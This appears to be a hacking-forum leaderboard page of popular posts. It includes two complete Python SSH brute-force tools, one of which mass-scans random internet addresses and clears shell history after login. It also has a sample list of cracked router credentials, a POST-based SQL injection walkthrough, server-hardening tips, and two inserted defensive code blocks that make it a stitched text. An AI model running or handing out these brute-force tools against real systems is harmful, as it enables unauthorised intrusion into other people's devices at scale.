Leaderboard

Popular Content

Showing content with the highest reputation on 03/09/14 in all areas

  1. Hello RST, I found a very interesting wiki about "Exploit Dev": references to vulnerability exploitation stuff. Exploitation - it-sec-catalog - References to vulnerability exploitation stuff. - Gathering references to IT-security related stuff. - Google Project Hosting. SRC => http://code.google.com/p/it-sec-catalog/wiki/Exploitation Check it out. See you.
    2 points
  2. The following script is a dictionary attack tool for SSH written in Python. import paramiko, sys, Queue, threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip,user,passwd = self.queue.get() self.kraken(ip,user,passwd) self.queue.task_done() def kraken(self,ip,user,passwd): try: if ip in cracked: return False if '%user%' in str(passwd): passwd = passwd.split("%")[0] + user + passwd.split("%")[2] if '%User%' in str(passwd): pwd = user + passwd.split("%")[2] passwd = passwd.split("%")[0]+pwd.title() if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip+' '+user+' '+passwd+'\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write(ip+' '+user+' '+passwd+'\n') nologs.flush() return False val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n') val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception, e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip+'\n') bad.flush() #print '\r[+]Tried '+ip+' '+user+' '+passwd+' ' ssh.close() return False #print ip, str(e) ssh.close() return False def brutemain(): if len(sys.argv) < 2: print """ SSH Brute Force Tool Author: @Elohim [RST] Usage: bruter ThreadNumber IpFile UserFile PassFile FilterSwitch* *The filter Switch Takes Either the word "bad" or "no". If you supply the word bad, it filters in bad.txt only the ips which indeed support ssh AUTH and password didn't work""" return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception, e: print 'Cant start more than',i,'Threads!'
global bad global val global nologs global cracked global raw cracked = [] bad = open('bad.txt','w') val = open('valid.txt','a') nologs = open('nologins.txt','a') raw = open('raw.txt','a') with open(str(sys.argv[2]),'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]),'rU') as uf: users = uf.read().splitlines() with open(str(sys.argv[4]),'rU') as pf: passwords = pf.read().splitlines() global dbg dbg = str(sys.argv[5]) try: for password in passwords: for user in users: for ip in ips: queue.put((ip,user,password)) except: pass queue.join() if __name__ == "__main__": brutemain() I gave a small usage example if you start it without arguments. I advise you to go through the IPs once with a single user and one password, and the bad argument, so that you are left only with the IPs that accept login over SSH. Then take the IPs from bad.txt and use only those. It creates 3 files: raw.txt nologin.txt and valid.txt. In raw.txt all of them will be put, both those that have *sh disabled and those that log in normally. In nologin.txt only those that support an SSH transport, or that have no active shell of any kind, will be put, and in valid.txt those that have an active shell, with the banner ( uname -a ) appended as well. Example of valid.txt: 68.170.**.24 ubnt ubnt|Linux Ubiquiti 2.6.32.54 #1 Thu Aug 16 13:41:25 EEST 2012 mips unknown 68.117.**.194 ubnt ubnt|Linux Ubiquiti 2.6.15-5.2 #1 Mon Dec 19 20:46:46 EET 2011 mips unknown 68.13.**.45 ubnt ubnt|Linux Ubiquiti 2.6.15-5.2 #1 Mon Dec 19 20:46:46 EET 2011 mips unknown 68.170.**.64 ubnt ubnt|Linux AirRouter 2.6.32.54 #1 Fri Mar 8 10:15:49 EET 2013 mips unknown If you want it to be verbose and see what is happening, remove the comments from the print . You need paramiko, but whoever really wants to use it will manage on their own. This is one of the reasons why I did not compile it for either Windows or Linux. I await opinions and possible improvements. Stop paying money for the so-called private "scanners" or "archives".
    1 point
  3. You have no right to act like a big dick here on the forum. Look at how long Toshiba has been on the forum and how long you have. Look at what reputation he has and what reputation you have. Consider also that he is a VIP and you are not. And the cherry on top: he is right and you are not (regarding this topic). So you have no right to make statements like: "don't even think about posting here again"
    1 point
  4. Introduction: Well, what can I say, I thought I would start a series of guides for beginners, most of them dealing with SQL injection. In this guide, I will explain how SQL injection is carried out using POST-type data requests (I will call this a "request"). What's this POST? A chocolate croissant?! I think we all know that the HTTP protocol (HTTP/1.1) supports the following request types (most of the time, GET/POST requests are used): GET; POST; HEAD; OPTIONS; CONNECT; PUT; TRACE; DELETE; GET requests serve to retrieve data and are visible in the web browser's address bar (they are also visible in "plain text"). Unlike GET requests, POST requests serve to process data from an HTML form with input fields, search fields, etc., into resources, and they are hidden, but they can be seen in the page's source code. Performing the injection: First, you need Live HTTP Headers. Second, let's assume we have the following form (http://www.site.com/login.php): Before pressing the Login button, open Live HTTP Headers, and it should look something like this: Once you have pressed the Login button (make sure you have ticked Capture), Live HTTP Headers should capture the data sent to the server and look something like this (after you have captured the data sent to the server, untick Capture): From the picture above, it can clearly be seen that before trying to log in, I entered a name and a password (even though they did not exist). Now, select the data sent to the server (the first line) and press Replay.
After you have pressed it, a new dialog should appear in which the parameters can be modified, and you can check whether they are vulnerable or not (in my case, the user parameter is vulnerable): When we press Replay, the modified parameters are sent to the server, and the result will be the following: In the picture above, it can clearly be seen that the site can be injected through POST requests. Now that the site is vulnerable, we can extract data (in this example, I will use the union based method and I will try to find the number of columns using the traditional group by x,y,z): After the command has been sent to the server, the page returns the following result (namely, that there is a single column in the database): Now I can try to extract the database version (for a start): In general, the idea is simple: after you have modified the vulnerable parameter as you please, you press Replay to send the command to the server.
    1 point
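
The defensive counterpart to the walkthrough above, as an added example that is not part of the original post: a login handler that builds its query from POST fields by string formatting, next to the parameterized form. The table, the field names (`user`, `pass`) and the request bodies are constructed for illustration, and SQLite stands in for the site's database.

```python
import sqlite3
from urllib.parse import parse_qs


def make_db():
    """Constructed one-row user table (plaintext password only to keep the demo short)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db


def post_fields(body):
    """Decode an application/x-www-form-urlencoded POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("user", [""])[0], fields.get("pass", [""])[0]


def login_vulnerable(db, body):
    """Query text is assembled from the POST fields: input becomes SQL."""
    user, password = post_fields(body)
    query = ("SELECT name FROM users WHERE name = '%s' AND password = '%s'"
             % (user, password))
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        # A stray quote broke the statement: the error page a tester looks for.
        return None


def login_parameterized(db, body):
    """Same check with placeholders: input is bound as data, never parsed as SQL."""
    user, password = post_fields(body)
    row = db.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (user, password),
    ).fetchone()
    return row is not None


# Constructed POST bodies: a normal login, a lone quote, a comment-out of the password test.
GOOD = "user=alice&pass=s3cret"
QUOTE = "user=alice%27&pass=x"
COMMENT_OUT = "user=alice%27--&pass=wrong"

if __name__ == "__main__":
    db = make_db()
    for body in (GOOD, QUOTE, COMMENT_OUT):
        print(body, login_vulnerable(db, body), login_parameterized(db, body))
```

The request method makes no difference to the outcome: the body of a POST is as much client-controlled input as a query string, and only the placeholder version treats it as data.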
  5. 1 point
  6. If even you have ended up asking such questions.... Too bad you forgot where you started from. On topic: congratulations on the tutorial :)
    1 point
  7. UPDATE v0.2 # CHANGELOG # v0.2 # - prints kernel version after login # - optimized timings when cracking # - detection for key authentication # - false positive / small honeypot detection # - save found target ip addresses to file, -O option # - 127.x.x.x will be excluded when scanning for random ip addresses # - unsort found target ip addresses, because of sequential port scanning # - resolve ip address by given hostname # - stop attacks on target when keyboard-interactive is required # - set threads for port scanning, -s option usage: ./against.py -i <arg> | -r <arg> | -I <arg> options: -i <ip/range> ip address/ip range/domain (e.g.: 192.168.0-3.1-254) -I <file> list of targets -r <num> attack random hosts -p <num> port number of sshd (default: 22) -t <num> threads per host (default: 4) -f <num> attack max hosts parallel (default: 8) -u <username> single username (default: root) -U <file> list of usernames -l <password> single password (default: toor) -L <file> list of passwords -o <file> write found logins to file -O <file> write found target ip addresses to file -s <num> threads when port scanning (default: 200) -T <sec> timeout in seconds (default: 3) -V print version of against.py and exit examples: attack single target usage: ./against.py -i nsa.gov -L passwords.txt scanning and attacking an ip-range usage: ./against.py -i 192.168.0-10.1-254 -u admin -l troll -s 500 #!/usr/bin/env python # -*- coding: latin-1 -*- from socket import * import multiprocessing import threading import time import paramiko import sys import os import logging import argparse import random import re # version of against.py VERSION = 'v0.2' # print our nice banner def banner(): print '--==[ against.py by pgt@nullsecurity.net ]==--' # print version def version(): print '[+] against.py %s' % (VERSION) sys.exit(0) # check if we can write to file def test_file(filename): try: outfile = open(filename, 'a') outfile.close() except IOError: print '[!] 
ERROR: cannot write to file \'%s\'' % filename sys.exit(1) # define command line parameters and help page def argspage(): parser = argparse.ArgumentParser( usage = '\n\n ./%(prog)s -i <arg> | -r <arg> | -I <arg>', formatter_class = argparse.RawDescriptionHelpFormatter, epilog = 'examples:\n\n' ' attack single target\n' ' usage: ./%(prog)s -i nsa.gov -L passwords.txt\n\n' ' scanning and attacking an ip-range\n' ' usage: ./%(prog)s -i 192.168.0-10.1-254 -u admin -l troll -s 500', add_help = False ) options = parser.add_argument_group('options', '') options.add_argument('-i', default=False, metavar='<ip/range>', help='ip address/ip range/domain (e.g.: 192.168.0-3.1-254)') options.add_argument('-I', default=False, metavar='<file>', help='list of targets') options.add_argument('-r', default=False, metavar='<num>', help='attack random hosts') options.add_argument('-p', default=22, metavar='<num>', help='port number of sshd (default: 22)') options.add_argument('-t', default=4, metavar='<num>', help='threads per host (default: 4)') options.add_argument('-f', default=8, metavar='<num>', help='attack max hosts parallel (default: 8)') options.add_argument('-u', default='root', metavar='<username>', help='single username (default: root)') options.add_argument('-U', default=False, metavar='<file>', help='list of usernames') options.add_argument('-l', default='toor', metavar='<password>', help='single password (default: toor)') options.add_argument('-L', default=False, metavar='<file>', help='list of passwords') options.add_argument('-o', default=False, metavar='<file>', help='write found logins to file') options.add_argument('-O', default=False, metavar='<file>', help='write found target ip addresses to file') options.add_argument('-s', default=200, metavar='<num>', help='threads when port scanning (default: 200)') options.add_argument('-T', default=3, metavar='<sec>', help='timeout in seconds (default: 3)') options.add_argument('-V', action='store_true', help='print version of 
against.py and exit') args = parser.parse_args() if args.V: version() if (args.i == False) and (args.I == False) and (args.r == False): print '' parser.print_help() sys.exit(0) return args # write found ip addresses / logins to file def write_to_file(filename, text): outfile = open(filename, 'a') outfile.write(text) outfile.close() # connect to target and checks for an open port def scan(target, port, timeout, oips): sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(timeout) result = sock.connect_ex((target, port)) sock.close() if result == 0: HOSTLIST.append(target) if oips: write_to_file(oips, target + '\n') # control the maximum number of threads def active_threads(threads, waittime): while threading.activeCount() > threads: time.sleep(waittime) # create thread and call scan() def thread_scan(args, target): port = int(args.p) timeout = float(args.T) oips = args.O threads = int(args.s) bam = threading.Thread(target=scan, args=(target, port, timeout, oips)) bam.start() active_threads(threads, 0.0001) time.sleep(0.001) # only the output when scanning for targets def scan_output(i): sys.stdout.flush() sys.stdout.write('\r[*] hosts scanned: {0} | ' \ 'possible to attack: {1}'.format(i, len(HOSTLIST))) # handle format of given target(s) def check_targets(targets): if re.match(r'^[0-9.\-]*$', targets): return targets try: target = gethostbyname(targets) return target except gaierror: print '[-] \'%s\' is unreachable' % (targets) finished() sys.exit(1) # unsort found hosts, because of incremental scanning def unsort_hostlist(): print '[*] unsort host list' for i in range(15): random.shuffle(HOSTLIST) # handle ip range format from command line def handle_ip_range(iprange): parted = tuple(part for part in iprange.split('.')) rsa = range(4) rsb = range(4) for i in range(4): hyphen = parted.find('-') if hyphen != -1: rsa = int(parted[:hyphen]) rsb = int(parted[1+hyphen:]) + 1 else: rsa = int(parted) rsb = int(parted) + 1 return (rsa, rsb) # call thread_scan() with target 
ip addresses def ip_range(args): targets = check_targets(args.i) rsa, rsb = handle_ip_range(targets) print '[*] scanning %s for ssh services' % targets counter = 0 for i in range(rsa[0], rsb[0]): for j in range(rsa[1], rsb[1]): for k in range(rsa[2], rsb[2]): for l in range(rsa[3], rsb[3]): target = '%d.%d.%d.%d' % (i, j, k, l) counter += 1 scan_output(counter) thread_scan(args, target) # waiting for the last running threads active_threads(1, 0.1) scan_output(counter) print '\n[*] finished scan' # create ip addresses def randip(): rand = range(4) for i in range(4): rand = random.randrange(0, 256) # exclude 127.x.x.x if rand[0] == 127: randip() ipadd = '%d.%d.%d.%d' % (rand[0], rand[1], rand[2], rand[3]) return ipadd # create random ip addresses def rand_ip(args): i = 0 print '[*] scanning random ips for ssh services' while len(HOSTLIST) < int(args.r): i += 1 scan_output(i) thread_scan(args, randip()) # waiting for the last running threads active_threads(1, 1) scan_output(i) print '\n[*] finished scan.' # checks if given filename by parameter exists def file_exists(filename): try: open(filename).readlines() except IOError: print '[!] 
ERROR: cannot open file \'%s\'' % filename sys.exit(1) # read-in a file with ip addresses def ip_list(ipfile): file_exists(ipfile) targets = open(ipfile).readlines() for target in targets: HOSTLIST.append(target) # connect to target and try to login def crack(target, port, user, passwd, outfile, timeo, i): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) user = user.replace('\n', '') passwd = passwd.replace('\n', '') try: ssh.connect(target, port=port, username=user, password=passwd, timeout=timeo, pkey=None, allow_agent=False) time.sleep(3) try: ssh.exec_command('unset HISTFILE ; unset HISTSIZE') time.sleep(1) ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a ' \ '|| cat /proc/version') output = 'kernel: %s' \ % (ssh_stdout.readlines()[0].replace('\n', '')) except: output = 'info: maybe a honeypot or false positive' login = '[+] login found for %s | %s:%s\n' \ '[!] %s' % (target, user, passwd, output) print login if outfile: write_to_file(outfile, login + '\n') ssh.close() os._exit(0) except paramiko.AuthenticationException, e: ssh.close() exception = str(e) if '[\'publickey\']' in exception: print '[-] key authentication only - ' \ 'stopped attack against %s' % (target) os._exit(1) elif '\'keyboard-interactive\'' in exception: print '[-] %s requires \'keyboard-interactive\' handler' % (target) os._exit(1) except: ssh.close() # after 3 timeouts per request the attack against $target will stopped if i < 3: i += 1 # reconnect after random seconds (between 0.6 and 1.2 sec) randtime = random.uniform(0.6, 1.2) time.sleep(randtime) crack(target, port, user, passwd, outfile, timeo, i) else: print '[-] too many timeouts - stopped attack against %s' % (target) os._exit(1) # create 'x' number of threads and call crack() def thread_it(target, args): port = int(args.p) user = args.u userlist = args.U password = args.l passlist = args.L outfile = args.o timeout = float(args.T) threads = int(args.t) if userlist: users = 
open(userlist).readlines() else: users = [user] if passlist: passwords = open(passlist).readlines() else: passwords = [password] # try/except looks dirty but we need it :/ try: for user in users: for password in passwords: Run = threading.Thread(target=crack, args=(target, port, user, password, outfile, timeout, 0,)) Run.start() # checks that we a max number of threads active_threads(threads, 0.01) time.sleep(0.1) # waiting for the last running threads active_threads(1, 1) except KeyboardInterrupt: os._exit(1) # create 'x' child processes (child == cracking routine for only one target) def fork_it(args): threads = int(args.t) childs = int(args.f) len_hosts = len(HOSTLIST) print '[*] attacking %d target(s)\n' \ '[*] cracking up to %d hosts parallel\n' \ '[*] threads per host: %d' % (len_hosts, childs, threads) i = 1 for host in HOSTLIST: host = host.replace('\n', '') print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts) hostfork = multiprocessing.Process(target=thread_it, args=(host, args)) hostfork.start() # checks that we have a max number of childs while len(multiprocessing.active_children()) >= childs: time.sleep(0.001) time.sleep(0.001) i += 1 # waiting for child processes while multiprocessing.active_children(): time.sleep(1) # \(0.o)/ def empty_hostlist(): if len(HOSTLIST) == 0: print '[-] found no targets to attack!' finished() sys.exit(1) # output when against.py finished all routines def finished(): print '[*] game over!!!' def main(): banner() args = argspage() if args.U: file_exists(args.U) if args.L: file_exists(args.L) if args.o: test_file(args.o) if args.O: test_file(args.O) if args.i: ip_range(args) unsort_hostlist() elif args.I: ip_list(args.I) else: rand_ip(args) time.sleep(0.1) empty_hostlist() fork_it(args) finished() if __name__ == '__main__': HOSTLIST = [] try: logging.disable(logging.CRITICAL) main() except KeyboardInterrupt: print '\nbye bye!!!' time.sleep(0.2) os._exit(1) http://www.nullsecurity.net/tools/cracker/against.py
    1 point
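
How the traffic produced by the two SSH dictionary-attack scripts above looks from the server side, as an added example that is not part of either post: a detector that scans sshd log lines for bursts of failed password logins per source address and reports any successful login that followed. The log lines are constructed samples in the usual OpenSSH syslog format; the window, the threshold and the year are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the usual OpenSSH syslog format (documentation addresses).
SAMPLE_LOG = """\
Mar  9 03:14:01 gw sshd[4101]: Failed password for root from 203.0.113.7 port 50122 ssh2
Mar  9 03:14:03 gw sshd[4102]: Failed password for root from 203.0.113.7 port 50130 ssh2
Mar  9 03:14:05 gw sshd[4103]: Failed password for invalid user admin from 203.0.113.7 port 50141 ssh2
Mar  9 03:14:07 gw sshd[4104]: Failed password for invalid user admin from 203.0.113.7 port 50150 ssh2
Mar  9 03:14:09 gw sshd[4105]: Failed password for ubnt from 203.0.113.7 port 50163 ssh2
Mar  9 03:14:12 gw sshd[4106]: Accepted password for ubnt from 203.0.113.7 port 50170 ssh2
Mar  9 08:30:10 gw sshd[5200]: Failed password for alice from 198.51.100.20 port 41000 ssh2
Mar  9 08:30:21 gw sshd[5201]: Accepted password for alice from 198.51.100.20 port 41002 ssh2
"""

AUTH_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s\S+\ssshd\[\d+\]:\s"
    r"(?P<kind>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_events(text, year=2014):
    """Return (timestamp, kind, user, ip) for every password-auth line."""
    events = []
    for line in text.splitlines():
        m = AUTH_LINE.match(line)
        if not m:
            continue  # unrelated syslog line
        stamp = "%d %s" % (year, " ".join(m["ts"].split()))  # syslog omits the year
        ts = datetime.strptime(stamp, "%Y %b %d %H:%M:%S")
        events.append((ts, m["kind"], m["user"], m["ip"]))
    return events


def detect(events, window=timedelta(seconds=60), threshold=5):
    """Flag sources with >= threshold failed logins inside one sliding window."""
    fails, accepts = defaultdict(list), defaultdict(list)
    for ts, kind, user, ip in events:
        (fails if kind == "Failed" else accepts)[ip].append((ts, user))
    findings = {}
    for ip, items in fails.items():
        items.sort()
        start = burst = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1  # drop failures that fell out of the window
            burst = max(burst, end - start + 1)
        if burst < threshold:
            continue  # e.g. a user who mistyped a password once
        first_fail = items[0][0]
        findings[ip] = {
            "max_failures_in_window": burst,
            "usernames": sorted({u for _, u in items}),
            # a success after the failures means the guessing may have worked
            "login_after_failures": sorted(
                {u for ts, u in accepts.get(ip, []) if ts > first_fail}),
        }
    return findings


if __name__ == "__main__":
    for ip, info in detect(parse_events(SAMPLE_LOG)).items():
        print(ip, info)
```

The first script queues one attempt per host before moving to the next credential, so on a single server its attempts arrive spread out; running the same check with a window of hours rather than a minute covers that pattern.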
  8. Hi, learn and use select + FD_CLR, FD_ISSET, FD_SET, FD_ZERO. What it does: it lets you check whether one or more sockets have incoming data, outgoing data or errors. That is, whether you have received data (in the kernel queues) on that socket, whether data is about to be sent on that socket, or whether an error has occurred on that socket, for example the connection being closed. What matters about this "select" is that you can "wait" on a socket for a certain interval (or not wait at all) for such an event to happen (receiving data, for example). That is, you can check whether the socket has incoming data. If it does, you process it; if not, you move on. Or you can wait 3000 ms to receive data. After 3000 ms, if you have received data, you process it; if not, you do something else. It is not very complicated and there are tutorials that explain this syscall in detail. PS: If you want Windows, besides select you have a complete set of asynchronous functions (the ones with Async) that take as a parameter a callback function which is called exactly when an event is triggered (such as receiving data).
    1 point
  9. Hello. Since the "server security business" has started, https://rstforums.com/forum/15896-tutorial-cum-securizam-un-server.rst , I propose to show you how to secure the components that make a server functional as well. Right, let's start with APACHE. WHAT is Apache? Apache is an open-source HTTP server. Apache supports a wide variety of modules that extend its functionality, ranging from server-side programming to authentication schemes. Some supported languages are: mod_perl, mod_python, Tcl and PHP. Other modules include: SSL and TLS support (mod_ssl), a proxy module, a URL rewriting module (known as the rewrite engine mod_rewrite), custom log files (mod_log_config) and filtering support (mod_include and mod_ext_filter). Another quality of the Apache server is virtual hosting, which consists of the ability to host several sites simultaneously on the same server. [source: Wikipedia] Let's get to ... work. For APACHE2: First, we hide which Linux variant is in use : Go here : /etc/apache2/apache2.conf [ or httpd.conf] and add at the end : Then we disable directory listing : , we add it in the .conf as well.
We uninstall the modules we are not interested in, for example : mod_imap, mod_include, mod_info, mod_userdir, mod_autoindex , with the following command : We install mod security : I wanted to use mod evasive, but I will show in .htaccess how to prevent brute force. Then we turn off symlinks : , we can put this in apache.conf or in .htaccess. We set a limit for uploads by users, in the conf : -------------------------------------------------------------------------------- Then we make a folder, named for example Also in cd/var/www/members, we set up a login for access: We do a chmod for access only from inside and that's it : chown root:root .htpassword Then let's move on to MYSQL. First of all, I RECOMMEND not using PHPMYADMIN. There are many vulnerabilities that you can find in phpmyadmin, exploits etc.. better do everything manually. Let's change the root password : We enter mysql : , we execute and that's it, we have changed the password. Use a password made up of !%@%%@##FD , over 13 characters I recommend... To be safe, we also change the name of root.. To prevent the reading of local files, in my.cnf , we add : , my is located in /etc/mysql/...*We remove the default users : We change the name of root, or of the admin .. : mysql: update user set user="sleedSCHEMALE" where user="root"; mysql> flush privileges; We remove the history : cat /dev/null > ~/.mysql_history That's about it for MySQL, let's move on to PHP : PHP Let's make sure we do not have : installed. Or you can check with : Then : We disable a few dangerous modules : Anti backdooring : PHPIDS (PHP-Intrusion Detection System) can be installed, to check the problems on the site...
Then .htaccess can also be modified so that we have no SQL injection vulnerabilities : This .htaccess can be used against both SQL INJECTION and XSS. I must point out that you can use SELinux for good system security, as a master in this taught me.. I will come back with more details. If you have any additions, please do not hesitate to send them or point them out. I await your suggestions for improvements, so that I can make a complex A TO Z tutorial about server security. Right now I am dedicating myself to a Linux variant, it is called sleenux and I want it to be for servers only; I am now testing how Debian 7 behaves on my distro, but I am eagerly waiting for 8 so that I can play with it as I want and make a very secure server. There will be a Desktop version. Anyway, I hope you liked it, have a good evening.
    1 point
  10. Maybe it arrived, maybe it didn't. This thing is illegal.
    -1 points
  11. Maybe you know darkpanda... I know him too.. But I didn't know he has a site.. I'll let you visit it. Garda de fier is here
    -1 points